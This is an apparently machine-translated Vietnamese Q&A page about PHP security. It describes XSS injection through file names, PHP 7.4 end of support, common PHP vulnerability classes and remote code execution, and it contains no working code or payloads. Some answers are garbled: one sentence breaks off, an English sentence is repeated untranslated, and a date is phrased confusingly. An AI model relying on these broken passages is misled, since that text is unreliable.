    Kiểu tấn công này liên quan đến việc kẻ thù chèn các ký tự độc hại [chẳng hạn như chuyển hướng XSS] vào tên tệp, trực tiếp hoặc gián tiếp, ký tự này sau đó được phần mềm đích sử dụng để tạo văn bản HTML hoặc nội dung có khả năng thực thi khác. Nhiều trang web dựa vào nội dung do người dùng tạo và tự động xây dựng các tài nguyên như tệp, tên tệp và liên kết URL trực tiếp từ dữ liệu do người dùng cung cấp. Trong mẫu tấn công này, kẻ tấn công tải lên mã có thể thực thi trong trình duyệt máy khách và/hoặc chuyển hướng trình duyệt máy khách đến trang web mà kẻ tấn công sở hữu. Tất cả các biến thể tải trọng tấn công XSS có thể được sử dụng để vượt qua và khai thác các lỗ hổng này

    Là PHP 7. 4 vẫn được hỗ trợ?

    Là một phần của nhánh phát hành PHP 7 và là bản phát hành nhỏ cuối cùng, PHP 7. 4 lần đầu tiên được giới thiệu ra thế giới vào tháng 11 năm 2019. Một năm trước, vào tháng 11 năm 2021, hỗ trợ tích cực cho phiên bản đã kết thúc

    Các lỗ hổng của PHP là gì?

    Dưới đây là một số lỗ hổng chính của PHP. .
    Tấn công Cross-site Scripting [XSS]. .
    Tấn công giả mạo yêu cầu liên trang [CSRF]. .
    tiêm SQL. .
    Tấn công bao gồm tập tin. .
    Cướp phiên. .
    Bỏ qua xác thực. .
    Tiêm lệnh. .
    Tiêm đối tượng PHP

    Thực thi mã từ xa PHP là gì?

    Thực thi mã từ xa được được sử dụng để phơi bày một dạng lỗ hổng có thể bị khai thác khi đầu vào của người dùng được đưa vào một tệp hoặc chuỗi và toàn bộ gói được chạy trên trình phân tích cú pháp của . Đây không phải là loại hành vi được thể hiện bởi nhà phát triển ứng dụng web. . This is not the type of behavior that is exhibited by the developer of the web application.

    Phát hiện phiên bản không được hỗ trợ của PHP là gì?

    Mô tả. Theo phiên bản của nó, việc cài đặt PHP trên máy chủ từ xa không còn được hỗ trợ . Thiếu hỗ trợ ngụ ý rằng nhà cung cấp sẽ không phát hành bản vá bảo mật mới nào cho sản phẩm. Do đó, nó có khả năng chứa các lỗ hổng bảo mật.

Chủ Đề